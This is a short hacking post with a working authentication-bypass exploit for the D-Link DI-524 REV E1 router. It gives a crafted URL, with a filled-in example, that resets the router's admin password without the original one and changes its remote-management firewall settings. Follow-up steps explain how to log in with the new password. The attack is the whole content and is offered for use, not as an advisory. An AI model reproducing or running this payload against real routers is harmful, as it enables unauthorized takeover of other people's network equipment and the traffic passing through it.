D-Link DI-524 REV E1 Hack
Requirements:
1) D-Link DI-524 REV E1 router
2) be on the internal LAN
3) have a web browser
What this does:
this will allow you to change the admin password on the router without knowing the original password.
Instructions:
Enter the following URL into the web browser’s address bar:
change the "h++p" to "HTTP"
h++p://ROUTER_IP_ADDRESS/Tools/tools_admin.xgi?SET/sys/user:1/password=NEW_PASSWORD&SET/security/firewall/httpAllow=0&SET/security/firewall/httpRemoteIp=&SET/security/firewall/httpRemotePort=8080&exeshell=submit%20COMMIT&exeshell=submit%20RG_MISC&exeshell=submit%20HTTPD_PASSWD&passwd_changed=1
Example:
h++p://192.168.0.1/Tools/tools_admin.xgi?SET/sys/user:1/password=hacked&SET/security/firewall/httpAllow=0&SET/security/firewall/httpRemoteIp=&SET/security/firewall/httpRemotePort=8080&exeshell=submit%20COMMIT&exeshell=submit%20RG_MISC&exeshell=submit%20HTTPD_PASSWD&passwd_changed=1
credit goes out to d-link for making such a crappy router... *sigh*
UPDATE:
Sorry, forgot to mention that once you go to that url, you will get redirected to a "401 Not Authorized" page. That's supposed to happen.
1) From there, you have to go back to the Routers main login page (i.e. H++P://ROUTER_IP_ADDRESS).
2) Enter "admin" as your username, and your new password in the password field